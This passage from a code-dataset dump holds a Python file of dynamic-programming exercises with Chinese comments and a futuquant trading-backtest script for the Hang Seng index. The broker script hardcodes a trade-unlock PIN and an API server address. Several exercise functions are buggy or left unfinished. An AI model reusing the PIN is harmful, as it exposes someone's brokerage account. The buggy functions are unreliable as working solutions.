S))","sub_path":"subtree_of_tree.py","file_name":"subtree_of_tree.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"583122877","text":"import numpy\n# 0-1背包,n 个物品,背包最大承重 maxWeight\n# 每个物品的决策:放还是不放,上一个状态集合可以推导下一个集合\n# 这里有个重要的预判,即每一步骤的状态集合是有限的,不会超过总的重量限制\ndef getMax(items,n,maxWeight):\n # 维护一个二维数组,记录每一阶段的状态集合\n states = numpy.zeros((maxWeight,maxWeight+1),dtype=numpy.bool)\n states[0][0] = True\n if items[0] < maxWeight:\n states[0][items[0]] = True\n #! 
状态转移,并且合并重复的状态\n for i in range(1,n): \n for j in range(maxWeight): # 不放入背包\n if states[i-1][j] == True: states[i][j] = True\n for j in range(maxWeight-items[i]+1): # 放入背包\n if states[i-1][j] == True: states[i][j+items[i]] = True\n # 在最后一个阶段的��态集合里,找到目标值\n for i in range(maxWeight,0,-1):\n if states[n-1][i] == True:\n print('The max weight is %s' %i)\n return i\n\n# getMax([2,3,4,5],4,8)\n\n# 一维数组解法\ndef getMaxPro(items,n,maxWeight):\n states = numpy.zeros(maxWeight+1,dtype=numpy.bool)\n states[0] = True\n if items[0] < maxWeight: states[items[0]] = True\n for i in range(1,n):\n for j in range(maxWeight-items[i],-1,-1): # 注意一维数组解法这里只能倒序,否则会重复计算\n if states[j] == True: states[j+items[i]] = True\n for k in range(maxWeight,-1,-1):\n if states[k] == True:\n print('The max weight pro is %s' %k)\n return k\n\n# getMaxPro([7,7,6,6,7,9],6,17)\n\n# 求具体的组合,回溯算法示例\n#! 后面会演示动态规划的倒推解法\ndef getCombines(items,n,maxWeight):\n theMax = getMaxPro(items,n,maxWeight)\n # i 控制递增,因为物品唯一,不能重复使用\n def recur(result,left,i):\n if left == 0: \n print(result)\n result = []\n return\n elif left < 0:\n return \n for j in range(i,n):\n newResult = result.copy() # 必须复制一份,尝试添加\n newResult.append(items[j]) \n recur(newResult,left-items[j],j+1)\n print('The combination by backtracking is :')\n recur([],theMax,0)\n\n# getCombines([1,2,3,6,7,4],6,10)\n\n# 倒推演示求单一组合\ndef getCombinesByDynamic(items,n,maxW):\n states = numpy.zeros((n,maxW+1),dtype=numpy.bool)\n states[0][0] = True\n if items[0] < maxW: states[0][items[0]] = True\n for i in range(1,n):\n for j in range(maxW + 1):\n if states[i-1][j] == True: states[i][j] = True\n for j in range(maxW-items[i]+1):\n if states[i-1][j] == True: states[i][j+items[i]] = True\n target = 0\n result = numpy.zeros(5,dtype=numpy.array)\n for j in range(maxW,0,-1):\n if states[n-1][j] == True: \n target = j\n break\n # 从目标值倒推,如果 states[i-1][target-items[i]] == True,说明物品 i 被选中了\n # 如果同时 states[i-1][target] == True,说明物品 i 可选可不选,要覆盖这种情况建议用回溯算法\n for i in 
range(n-1,0,-1):\n if target - items[i] > 0 and states[i-1][target-items[i]] == True:\n result.append(items[i])\n target -= items[i]\n # 上述倒推到第二行,第一行单独处理\n if target > 0: result.append(target)\n print('The combination is %s' %result)\n return result\n\n# getCombinesByDynamic([1,2,3,6,7,4],6,10)\n\n# 0-1背包升级版,加入物品价值\ndef getMaxValue(items,values,n,maxW):\n states = numpy.zeros((n,maxW+1),dtype=numpy.int8)\n states[0][0] = 0\n if items[0] < maxW: states[0][items[0]] = values[0]\n # 状态转移推导\n for i in range(1,n):\n for j in range(maxW+1):\n if states[i-1][j]: states[i][j] = states[i-1][j]\n for j in range(maxW-items[i]+1):\n # 注意,这里只能取同等重量下的最大价值,而不是被后来的组合覆盖\n if states[i-1][j] >= 0 and states[i-1][j] + values[i] > states[i][j+items[i]]: \n states[i][j+items[i]] = states[i-1][j] + values[i]\n maxV = 0\n for i in range(maxW,0,-1):\n if states[n-1][i] > maxV: maxV = states[n-1][i]\n print('The max value is %s' %maxV)\n return maxV\n\n# getMaxValue([1,2,3,6,7,4],[3,5,3,6,7,4],6,10)\n\n# 扩展,购物车取价格总和刚好超过 m 的值以及组合(薅羊毛)\n# 这里我们需要手动定义一个上限,比如 m + 100\ndef shoppingCart(values,n,targetValue):\n maxValue = targetValue + 100\n states = numpy.zeros((n,maxValue),dtype=numpy.bool)\n states[0][0] = True\n if values[0] < targetValue: states[0][values[0]] = True\n # 状态推导\n for i in range(1,n):\n for j in range(maxValue):\n if states[i-1][j] == True: states[i][j] = True\n for j in range(maxValue-values[i]):\n if states[i-1][j] == True: states[i][j+values[i]] = True\n # 找到第一个大于 targetValue 的金额\n result = 0\n for i in range(targetValue,maxValue+1):\n if states[n-1][i] == True:\n result = i\n break\n # 倒推求组合\n arr = []\n tempTotal = result\n for i in range(n-1,0,-1):\n if tempTotal-values[i] > 0 and states[i-1][tempTotal-values[i]] == True:\n arr.append(values[i])\n tempTotal -= values[i]\n if tempTotal > 0:\n arr.append(values[0])\n print('The combination is %s' %arr)\n print('The proper check bill is ¥%s' %result)\n return arr\n\n# shoppingCart([7,7,6,6,7,9],6,17)\n\n# 类杨辉三角,求最短路径\ndef 
getShortestRecur(i,j,mini,d,n,total):\n if i == n-1:\n if total < mini: mini = total\n print('miniDist is %s' %mini)\n return \n if i < n and j < n:\n getShortestRecur(i+1,j,mini,d,n,total+d[i+1][j])\n getShortestRecur(i+1,j+1,mini,d,n,total+d[i+1][j+1])\n \nd = [[3],[5,3],[6,2,1],[9,3,1,6]]\n# getShortestRecur(0,0,100,d,4,3)\n\n# 动态规划解法\ndef getShortestDynamic(d,n):\n states = [[100]*4]*4\n states[0][0] = d[0][0]\n # 状态推导,合并重复状态只取最小值\n for i in range(1,n):\n for j in range(i+1): # 选��边\n if states[i-1][j] + d[i][j] < states[i][j]:\n states[i][j] = states[i-1][j] + d[i][j]\n for j in range(i): # 选右边\n if states[i-1][j] + d[i][j+1] < states[i][j+1]:\n states[i][j+1] = states[i-1][j] + d[i][j+1]\n # 从最后一排找到目标\n mini = 100\n for i in range(n):\n if states[n-1][i] < mini:\n mini = states[n-1][i]\n print('The miniDist is %s' %mini)\n return mini\n\n# getShortestDynamic(d,4)\n\n# 有1、3、5三种硬币,数量不限\n# 使用最少的硬币找零钱\n# 回溯,暴力搜索\nleast = 9\ndef getCoinsRecur(result,left,coins):\n global least\n if left == 0:\n if len(result) < least: least = len(result)\n return\n if left < 0:\n return\n for v in coins:\n newResult = result.copy()\n newResult.append(v)\n getCoinsRecur(newResult,left-v,coins)\n\n# getCoinsRecur([],9,[1,3,5])\n# print(least)\n\n# 动态规划,利用状态转移方程,递归\nmini = 9\ncache = numpy.zeros((10,10),dtype=numpy.int8)\ndef getMiniCoinsDynamic(moneyLeft, count):\n global mini\n if moneyLeft == 0:\n if count < mini:\n mini = count\n return 1\n if moneyLeft < 0:\n return 0\n if cache[moneyLeft][count] > 0:\n return cache[moneyLeft][count]\n currentMini = min(getMiniCoinsDynamic(moneyLeft-1,count+1), getMiniCoinsDynamic(moneyLeft-3,count+1), getMiniCoinsDynamic(moneyLeft-5,count+1)) + 1\n cache[moneyLeft][count] = currentMini\n return currentMini\n\n# getMiniCoinsDynamic(9,0)\n# print('The miniCoins is %s' %mini)\n\n# 借助上述结果,顺便求具体的组合\n\ndef getMiniCoins(moneyLeft, result):\n global mini\n if moneyLeft == 0:\n if len(result) == mini:\n print(result)\n return \n if moneyLeft < 0:\n 
return \n if len(result) > mini:\n return\n result1 = result.copy()\n result3 = result.copy()\n result5 = result.copy()\n result1.append(1)\n result3.append(3)\n result5.append(5)\n getMiniCoins(moneyLeft-1,result1)\n getMiniCoins(moneyLeft-3,result3)\n getMiniCoins(moneyLeft-5,result5)\n\n# getMiniCoins(9,[])\n\n# 编辑距离 - 莱文斯坦距离:增、删、改都会导致距离+1,距离越小越相似\n# 利用 dictionary 缓存\nmini = 100\na = 'mitctttmuaaa'\nb = 'mttttacnuaaa'\nmatrix = {}\ndef getLwstDP(i,j,editest):\n global mini\n if i == 0 or j == 0:\n if j > 0: editest += j\n if i > 0: editest += i\n if editest < mini: \n mini = editest\n return editest\n if 's'+str(i)+str(j)+str(editest) in matrix:\n return matrix['s'+str(i)+str(j)+str(editest)]\n if a[i] == b[j]:\n dist = min(getLwstDP(i-1,j,editest+1),getLwstDP(i,j-1,editest+1),getLwstDP(i-1,j-1,editest))\n else:\n dist = min(getLwstDP(i-1,j,editest+1),getLwstDP(i,j-1,editest+1),getLwstDP(i-1,j-1,editest+1))\n matrix['s'+str(i)+str(j)+str(editest)] = dist\n return dist\n\n# getLwstDP(len(a)-1,len(b)-1,0)\n# print('lwstDP is %s' %mini)\n\n# 编辑距离 - 最长公共子串:增、删都会导致长度-1,越长越相似\nmaxLcs = 0\ndef getMaxLcs(i,j,longest):\n global maxLcs\n if i < 0 or j < 0:\n if longest > maxLcs:\n maxLcs = longest\n return longest\n if 's'+str(i)+str(j)+str(longest) in matrix:\n return matrix['s'+str(i)+str(j)+str(longest)]\n if a[i] == b[j]:\n current = max(getMaxLcs(i-1,j,longest),getMaxLcs(i,j-1,longest),getMaxLcs(i-1,j-1,longest+1))\n else:\n current = max(getMaxLcs(i-1,j,longest),getMaxLcs(i,j-1,longest),getMaxLcs(i-1,j-1,longest))\n matrix['s'+str(i)+str(j)+str(longest)] = current\n return current\n\ngetMaxLcs(len(a)-1,len(b)-1,0)\nprint('maxLcs is %s' %maxLcs)\n\n# n个不同的数字,求最长的递增子序列长度\n# 问题需要转换为:分别求出以每个元素结尾的最长子序列长度,取它们之中的最大值\narr = [3,5,1,2]\nmaxL = 0\ncache = [0] * 9\ndef getMaxAscendLen(i):\n global maxL\n if i == 0:\n return 1\n if cache[i] > 0:\n return cache[i]\n result = 0\n for j in range(i-1,-1,-1):\n lastResult = getMaxAscendLen(j)\n if arr[j] < arr[i]:\n result = 
max(lastResult + 1, result)\n else:\n # 左边元素比较大,那么以 i 元素结尾的最长子序列就只有它自己\n result = 1\n if result > maxL:\n maxL = result\n cache[i] = result\n return result\n\n# getMaxAscendLen(3)\n# print(maxL)\n\ndef getMaxAscendLenByLoop(arr):\n length = len(arr)\n maxLen = 1\n states = [1] * length\n for i in range(1,length):\n for j in range(0,i):\n if arr[j] < arr[i]:\n states[i] = max(states[j]+1,states[i])\n else:\n continue\n if states[i] > maxLen:\n maxLen = states[i]\n print(maxLen)\n return maxLen\n\n# getMaxAscendLenByLoop([3,5,1,2])\n\nimport math\n\ndef isPalindrome(s):\n length = len(s)\n if length == 1:\n return True\n middle = math.floor(length/2)\n i = 0\n j = length - 1\n while i < middle and j >= middle:\n if s[i] != s[j]:\n return False\n i += 1\n j -= 1\n return True\n\n# print(isPalindrome('abba'))\n\n# 最长回文子串\n# 解法一:从两边顶点找起,DP 转移方程为 P(i,j) = True if P(i+1,j-1) == True and S[i] == S[j] else False\n\ndef longestPalindrome(s):\n states = {}\n length = len(s)\n if length <= 1:\n return s\n\n def isFullfilled(i,j):\n if i == j:\n return True\n if j == i+1 and s[i] == s[j]:\n return True\n if j == i+1 and s[i] != s[j]:\n return False\n if 'k' + str(i) + 's' + str(j) in states:\n return states['k' + str(i) + 's' + str(j)]\n currentStatus = isFullfilled(i+1,j-1) == True and s[i] == s[j]\n states['k' + str(i) + 's' + str(j)] = currentStatus\n return currentStatus\n \n maxLen = -1\n result = ''\n for i in range(length):\n for j in range(length-1,i-1,-1):\n if isFullfilled(i,j) == True and j - i > maxLen:\n maxLen = j - i\n result = s[i:j+1]\n return result\n\ntest = 
\"slvafhpfjpbqbpcuwxuexavyrtymfydcnvvbvdoitsvumbsvoayefsnusoqmlvatmfzgwlhxtkhdnlmqmyjztlytoxontggyytcezredlrrimcbkyzkrdeshpyyuolsasyyvxfjyjzqksyxtlenaujqcogpqmrbwqbiaweacvkcdxyecairvvhngzdaujypapbhctaoxnjmwhqdzsvpyixyrozyaldmcyizilrmmmvnjbyhlwvpqhnnbausoyoglvogmkrkzppvexiovlxtmustooahwviluumftwnzfbxxrvijjyfybvfnwpjjgdudnyjwoxavlyiarjydlkywmgjqeelrohrqjeflmdyzkqnbqnpaewjdfmdyoazlznzthiuorocncwjrocfpzvkcmxdopisxtatzcpquxyxrdptgxlhlrnwgvee\"\n# print(longestPalindrome(test))\n\n# 解法二:循环遍历,找出每个元素为中心(或伪中心)时的最长回形子串,取其中最长的,也属于 DP 范畴\n\n# 辅助函数,检查子串长度\ndef check(s,i,j):\n left = i\n right = j\n while left >=0 and right < len(s) and s[left] == s[right]:\n left -= 1\n right += 1\n return right - left - 1\n\ndef longestPalindromePlus(s):\n length = len(s)\n start = 0\n end = 0\n for i in range(length):\n # 检查最长子串\n len1 = check(s,i,i)\n len2 = check(s,i,i+1)\n maxLen = max(len1,len2)\n if maxLen > end - start:\n start = i - math.floor((maxLen-1)/2)\n end = i + math.floor(maxLen/2)\n return s[start:end+1]\n\nprint(longestPalindromePlus(test))\n\n# 给定一个数组,求连续子串的最大和\ndef maxSubArray0(nums):\n # 正常应该是 DP 解法,这里使用特殊的累加解法\n # 当前面之和为正数,累加到当前值,最后求数组最大值\n for i in range(1,len(nums)):\n if nums[i-1] > 0:\n nums[i] += nums[i-1]\n return max(nums)\n\n# TODO 给定一个整数数组,求组成最大和的连续子串\n# 思路:从左往右遍历一遍,当前和如果小于0则舍弃\ndef maxSubArray(nums):\n resultList = [nums[0]]\n currentSum = 0\n for i in nums:\n copyList = resultList.copy()\n if currentSum >= 0:\n currentSum += i\n copyList.append(i)\n else:\n currentSum = i\n copyList = [i]\n if sum(copyList) > sum(resultList):\n resultList = copyList.copy\n\n","sub_path":"algorithm-playground/dp/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":13473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"27860108","text":"from futuquant import *\nimport time\nimport math\nimport random\nimport matplotlib.pyplot as plt\n\n\nclass broker:\n def __init__(self, api_svr_ip, api_svr_port):\n 
self.api_svr_ip = api_svr_ip\n self.api_svr_port = api_svr_port\n\n def connect_api(self):\n self.quote_ctx = OpenQuoteContext(host=self.api_svr_ip, port=self.api_svr_port)\n self.tradehk_ctx = OpenHKTradeContext(self.api_svr_ip, self.api_svr_port)\n ret_code, ret_data = self.tradehk_ctx.unlock_trade(\"584679\")\n\n def get_day_k(self ):\n code = 'HK.800000'\n num = 999\n ktype = \"K_15M\"\n sum = 0\n ret, ret_date = self.quote_ctx.subscribe(code, ktype)\n if ret != 0:\n print(\"subscribe fail\")\n print(ret_date)\n return -1, 0\n #code time_key open close high low volume turnover pe_ratio turnover_rate\n ret_code, ret_data = self.quote_ctx.get_cur_kline(code, num, ktype, autype='qfq')\n if ret_code != 0:\n print(ret_data)\n return -1, ret_data\n\n ret_data[\"MA4\"] = 0.0\n ret_data[\"MA4_I\"] = 0.0\n ret_data[\"MA4_R_T3\"] = 0.0\n for i in range(3, num):\n ret_data.iloc[i, 10] = ( ret_data.iloc[i, 3] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n ret_data.iloc[i, 11] = ( ret_data.iloc[i, 2] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n\n for i in range(6, num):\n ret_data.iloc[i, 12] = ( ret_data.iloc[i, 11] - ret_data.iloc[i - 3, 11] )/3\n\n\n for i in range(4, num):\n date_time_p = ret_data.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = ret_data.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n if date_c == date_p:\n pass\n else:\n close_p = ret_data.iloc[i - 1, 3]\n open_c = ret_data.iloc[i, 2]\n gap = open_c - close_p\n ma4_r = ret_data.iloc[i, 12]\n rst = ret_data.iloc[i, 3] - ret_data.iloc[i, 2]\n if gap < 0:\n if ma4_r > 0:\n trade_ret = rst\n else:\n trade_ret = 0\n else:\n if ma4_r > 0:\n trade_ret = 0\n else:\n trade_ret = rst * (-1)\n\n\n\n print(\"**** \" + date_c)\n print(\" \" + \"Gap: \" + str(gap))\n print(\" \" + \"Rat: \" + str(ma4_r))\n print(\" \" + \"Ret: \" + str(rst))\n print(\" \" + \"Trade Result \" + str(trade_ret))\n sum += trade_ret\n 
print(\"Total: \" + str(sum))\n return 0, ret_data\n\n def test_random_5M_history(self, start, end):\n code = 'HK.800000'\n # #66 5mK per day\n ktype = \"K_5M\"\n\n ## BEAR\n type = -1\n\n sum = 0\n # code time_key open close high low pe_ratio turnover_rate volume turnover change_rate MA4 MA4_I MA4_R_T3 trade_result\n pos_open = 2\n pos_close = 3\n pos_high = 4\n pos_low = 5\n pos_ma4 = 11\n pos_ma4_i = 12\n pos_ma4_r = 13\n pos_test_result = 14\n ret, ret_data = self.get_history_k(code, start, end, ktype)\n if ret != 0:\n print(\"get history fail\")\n print(ret_data)\n return -1, 0\n num = len(ret_data)\n ret_data[\"MA4\"] = 0.0\n ret_data[\"MA4_I\"] = 0.0\n ret_data[\"MA4_R_T3\"] = 0.0\n ret_data[\"trade_result\"] = 0.0\n for i in range(3, num):\n ret_data.iloc[i, pos_ma4] = ( ret_data.iloc[i, 3] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n ret_data.iloc[i, pos_ma4_i] = ( ret_data.iloc[i, 2] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n\n for i in range(6, num):\n ret_data.iloc[i, pos_ma4_r] = ( ret_data.iloc[i, pos_ma4_i] - ret_data.iloc[i - 3, pos_ma4_i] )/3\n\n sum_up = 0\n sum_down = 0\n for i in range(4, num):\n date_time_p = ret_data.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = ret_data.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n\n\n if date_c == date_p:\n pass\n else:\n cnt = random.randint(2,65)\n buy_bar_num = i + cnt - 1\n buy_price = ret_data.iloc[i, pos_open]\n min = ret_data.iloc[i, pos_low]\n max = ret_data.iloc[i, pos_high]\n for j in range(buy_bar_num + cnt - 1, buy_bar_num + 65):\n low = ret_data.iloc[j, pos_low]\n high = ret_data.iloc[j, pos_high]\n if low < min:\n min = low\n if high > max:\n max = high\n print(ret_data.iloc[buy_bar_num, 1])\n\n float_up = max - buy_price\n float_down = min - buy_price\n sum_up += float_up\n sum_down += float_down\n date = ret_data.iloc[buy_bar_num, 1]\n print(\"**** \" + date_c + \" \" + str(date))\n 
print(\" \" + \"UP : \" + str(float_up))\n print(\" \" + \"DOWN: \" + str(float_down))\n\n\n\n\n return 0, ret_data\n\n def test_magment_15M_history(self, start, end):\n code = 'HK.800000'\n\n ktype = \"K_15M\"\n sum = 0\n # code time_key open close high low pe_ratio turnover_rate volume turnover change_rate MA4 MA4_I MA4_R_T3 trade_result\n pos_open = 2\n pos_close = 3\n pos_ma4 = 11\n pos_ma4_i = 12\n pos_ma4_r = 13\n pos_test_result = 14\n ret, ret_data = self.get_history_k(code, start, end, ktype)\n if ret != 0:\n print(\"get history fail\")\n print(ret_data)\n return -1, 0\n num = len(ret_data)\n ret_data[\"MA4\"] = 0.0\n ret_data[\"MA4_I\"] = 0.0\n ret_data[\"MA4_R_T3\"] = 0.0\n ret_data[\"trade_result\"] = 0.0\n for i in range(3, num):\n ret_data.iloc[i, pos_ma4] = ( ret_data.iloc[i, 3] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n ret_data.iloc[i, pos_ma4_i] = ( ret_data.iloc[i, 2] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n\n for i in range(6, num):\n ret_data.iloc[i, pos_ma4_r] = ( ret_data.iloc[i, pos_ma4_i] - ret_data.iloc[i - 3, pos_ma4_i] )/3\n\n\n for i in range(4, num):\n date_time_p = ret_data.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = ret_data.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n if date_c == date_p:\n pass\n else:\n close_p = ret_data.iloc[i - 1, 3]\n open_c = ret_data.iloc[i, 2]\n gap = open_c - close_p\n ma4_r = ret_data.iloc[i, pos_ma4_r]\n rst = ret_data.iloc[i, 3] - ret_data.iloc[i, 2]\n ## Gao Kai\n if gap > 0:\n trade_ret = rst * (-1)\n pass\n ## Di Kai\n else:\n trade_ret = rst\n ret_data.iloc[i, pos_test_result] = trade_ret\n print(\"**** \" + date_c)\n print(\" \" + \"Gap: \" + str(gap))\n print(\" \" + \"Rat: \" + str(ma4_r))\n print(\" \" + \"Ret: \" + str(rst))\n print(\" \" + \"Trade Result \" + str(trade_ret))\n sum += trade_ret\n print(\"Total: \" + str(sum))\n\n # for i in range(4, num):\n # if ret_data.iloc[i, 
pos_test_result]!=0:\n # print( ret_data.iloc[i, pos_test_result])\n\n\n\n return 0, ret_data\n\n def test_boll(self, start, end):\n #code time_key open close high low pe_ratio turnover_rate volume turnover change_rate\n # 0 1 2 3 4 5 6 7 8 9 10\n\n code = 'HK.800000'\n ktype = \"K_15M\"\n\n ret, ret_data = self.get_history_k(code, start, end, ktype)\n if ret != 0:\n print(\"get history fail\")\n print(ret_data)\n return -1, 0\n num = len(ret_data)\n\n\n\n # BOLL Paras\n boll_n = 20\n boll_k = 2\n\n\n pos_k_open = 2\n pos_k_close = 3\n pos_k_high = 4\n pos_k_low = 5\n\n pos_boll_mid = 11\n pos_boll_upper = 12\n pos_boll_lower = 13\n pos_boll_mid_i = 14\n pos_boll_upper_i = 15\n pos_boll_lower_i = 16\n ret_data[\"BOLL_MID\"] = 0.0\n ret_data[\"BOLL_UPPER\"] = 0.0\n ret_data[\"BOLL_LOWER\"] = 0.0\n ret_data[\"BOLL_MID_I\"] = 0.0\n ret_data[\"BOLL_UPPER_I\"] = 0.0\n ret_data[\"BOLL_LOWER_I\"] = 0.0\n for i in range(boll_n - 1, num):\n # 1. MA\n ma = 0\n for j in range(i - boll_n + 1, i):\n ma += ret_data.iloc[j, pos_k_close] / boll_n\n\n ma_i = ma + ret_data.iloc[i, pos_k_open] / boll_n\n ma = ma + ret_data.iloc[i, pos_k_close] / boll_n\n\n\n # 2. Sigma\n val = 0\n for j in range(i - boll_n + 1, i + 1):\n val += ((ret_data.iloc[j, pos_k_close] - ma)**2)/boll_n\n sigma = math.sqrt(val)\n\n val = 0\n for j in range(i - boll_n + 1, i):\n val += ((ret_data.iloc[j, pos_k_close] - ma_i)**2)/boll_n\n val += ((ret_data.iloc[i, pos_k_open] - ma_i) ** 2) / boll_n\n sigma_i = math.sqrt(val)\n\n # 3. 
Upper & Lower\n upper = ma + boll_k * sigma\n lower = ma - boll_k * sigma\n\n upper_i = ma_i + boll_k * sigma_i\n lower_i = ma_i - boll_k * sigma_i\n\n ret_data.iloc[i, pos_boll_mid] = ma\n ret_data.iloc[i, pos_boll_upper] = upper\n ret_data.iloc[i, pos_boll_lower] = lower\n\n ret_data.iloc[i, pos_boll_mid_i] = ma_i\n ret_data.iloc[i, pos_boll_upper_i] = upper_i\n ret_data.iloc[i, pos_boll_lower_i] = lower_i\n\n\n ## Strategy and Test\n ## Let's see a new day opens on which part\n date = []\n boll_upper = []\n boll_lower = []\n high = []\n low = []\n start = []\n end = []\n for i in range(boll_n - 1, num):\n date_time_p = ret_data.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = ret_data.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n if date_c == date_p:\n pass\n else:\n if ret_data.iloc[i, pos_k_open] > ret_data.iloc[i - 1, pos_k_close] and \\\n ret_data.iloc[i, pos_k_low] <= (ret_data.iloc[i, pos_boll_lower_i] - 10 ) and \\\n ret_data.iloc[i, pos_k_open] > ret_data.iloc[i, pos_boll_lower_i]:\n\n date.append(date_c)\n boll_upper.append(ret_data.iloc[i, pos_boll_upper_i])\n boll_lower.append(ret_data.iloc[i, pos_boll_lower_i])\n high.append(ret_data.iloc[i, pos_k_high])\n low.append(ret_data.iloc[i, pos_k_low])\n start.append(ret_data.iloc[i, pos_k_open])\n end.append(ret_data.iloc[i, pos_k_close])\n print(date_c + \" :\" + str(ret_data.iloc[i, pos_k_close] - ret_data.iloc[i, pos_boll_lower_i]))\n\n plt.plot(boll_upper, 'r--')\n plt.plot(boll_lower, 'r--')\n #plt.plot(high, 'g^')\n plt.plot(low, 'gv')\n #plt.plot(start, '.')\n plt.plot(end, '.')\n plt.show()\n\n return 0, ret_data\n\n\n def get_cn_list(self):\n cn_list = []\n market = \"SH\"\n market = \"HK\"\n plate_class = \"ALL\"\n\n ret_code, ret_data = self.quote_ctx.get_plate_list( market, plate_class)\n if ret_code != 0:\n return -1, cn_list\n print(\"Get Plate Done.\")\n print(ret_data)\n\n plate_list = ret_data['code']\n for plate_code in plate_list:\n ret_code, ret_data = 
self.quote_ctx.get_plate_stock(plate_code)\n if ret_code != 0:\n print(\"ERR \" + str(plate_code))\n for code in ret_data[\"code\"]:\n cn_list.append(code)\n print(str(plate_code) + \" Done.\")\n time.sleep(1)\n\n return 0, cn_list\n\n def get_history_k(self, code, start, end, ktype='K_DAY'):\n ret_code, ret_data = self.quote_ctx.get_history_kline(code, start, end, ktype, autype='qfq'\n )\n if ret_code != 0:\n return -1, []\n return 0, ret_data\n\n def find_warrent(self):\n ret_code, ret_data = self.quote_ctx.get_stock_basicinfo(\"HK\", stock_type='WARRANT')\n if ret_code != 0:\n return -1, cn_list\n print(\"Get WARRENT Done.\")\n print(ret_data)\n\n def get_acc_info(self):\n ret_code, ret_data = self.tradehk_ctx.accinfo_query(0)\n if ret_code != 0:\n print(\"Fail\")\n print(ret_data)\n try:\n print(ret_data[\"ZQSZ\"][0])\n print(ret_data[\"KQXJ\"][0])\n print(ret_data[\"ZSJE\"][0])\n print(ret_data[\"YYJDE\"][0])\n print(ret_data[\"Power\"][0])\n except:\n print(\"???\")\n if ret_data[\"ZCJZ\"][0] > 10000:\n print(\"OK\")\n\n\n\n ret_code, ret_data = self.tradehk_ctx.position_list_query(strcode='', stocktype='', pl_ratio_min='', pl_ratio_max='',\n envtype=0)\n if ret_code != 0:\n print(\"Fail\")\n print(ret_data)\n\n\n\n\ndef fitting_shape_cup(df_k_line):\n k_line = df_k_line\n cnt = len(k_line)\n #prices_close = k_line['close']\n prices_high = []\n for price in df_k_line[\"high\"]:\n prices_high.append(price)\n\n random_point_c = cnt - 1 # 随机选取random_point_c代表今天\n\n # Find B\n para_gama = 1 # gama为B点相对于C点高度的系数\n para_span_request_bc = 3 # B点与C点之间的周数至少为span_request_bc\n ret, point_b = shape_cup_find_b(prices_high, random_point_c, para_gama, para_span_request_bc)\n if ret != -1:\n print(\"B found\")\n # Find A\n omega = 1.05 # omega为A点相对于B点高度的系数\n span = 7 # span为时间跨度的周数\n ret, point_a = shape_cup_find_a(prices_high, point_b, omega, span)\n if ret != -1:\n print(\"A found\")\n print(df_k_line.iloc[point_a,])\n print(df_k_line.iloc[point_b,])\n else:\n print(\"A not 
found\")\n else:\n print(\"B not found\")\n\n return\n\ndef shape_cup_find_b(prices_high, random_point_c, gama, span_request_bc):\n ret = -1\n val = -1\n cnt = len(prices_high)\n for i in range(cnt - random_point_c + span_request_bc + 1, cnt):\n if prices_high[-i] > gama * prices_high[random_point_c]:\n if prices_high[-i - 1] > prices_high[-i]:\n continue\n else:\n point_b = cnt - i + 1\n if point_b > random_point_c:\n ret = -1\n break\n else:\n print(point_b)\n val = point_b\n ret = 0\n break\n return ret, val\n\ndef shape_cup_find_a(prices_high, point_b, omega, span):\n ret = -1\n val = -1\n cnt = len(prices_high)\n for i in range(cnt - point_b + span + 1, cnt):\n if prices_high[-i] > omega * prices_high[point_b]:\n if prices_high[-i - 1] > prices_high[-i]:\n continue\n else:\n point_a = cnt - i + 1\n if point_a > point_b:\n ret = -1\n break\n else:\n one_third = int(point_a + (point_b - point_a) / 3)\n two_third = int(point_a + (point_b - point_a) * 2 / 3)\n List = [prices_high[k] > max(prices_high[one_third], prices_high[two_third]) for k in\n range(one_third + 1, two_third)]\n if True in List:\n continue\n else:\n print(point_a)\n ret = 0\n val = point_a\n break\n return ret, val\n\n\n\n\nif __name__ == \"__main__\":\n API_RM_SVR_IP = '119.29.141.202'\n API_LO_SVR_IP = '127.0.0.1'\n API_SVR_PORT = 11111\n b = broker(API_LO_SVR_IP, API_SVR_PORT)\n b.connect_api()\n #b.test_boll()\n start = '2017-12-20'\n end = '2018-06-30'\n #ret, k = b.test_boll(start, end)\n ret, k = b.get_history_k(\"HK.800000\", start, end, \"K_5M\")\n if ret == -1:\n print(\"fail\")\n cycle = 9\n test_day = '2018-07-09'\n test_day2 = '2018-07-20'\n ret, test_set = b.get_history_k(\"HK.800000\", test_day2, test_day2, \"K_5M\")\n if ret == -1:\n print(\"fail\")\n #print(test_set)\n test_ret = [[],[]]\n cnt = 0\n for i in range(1, len(k)):\n date_time_p = k.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = k.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n if date_c == 
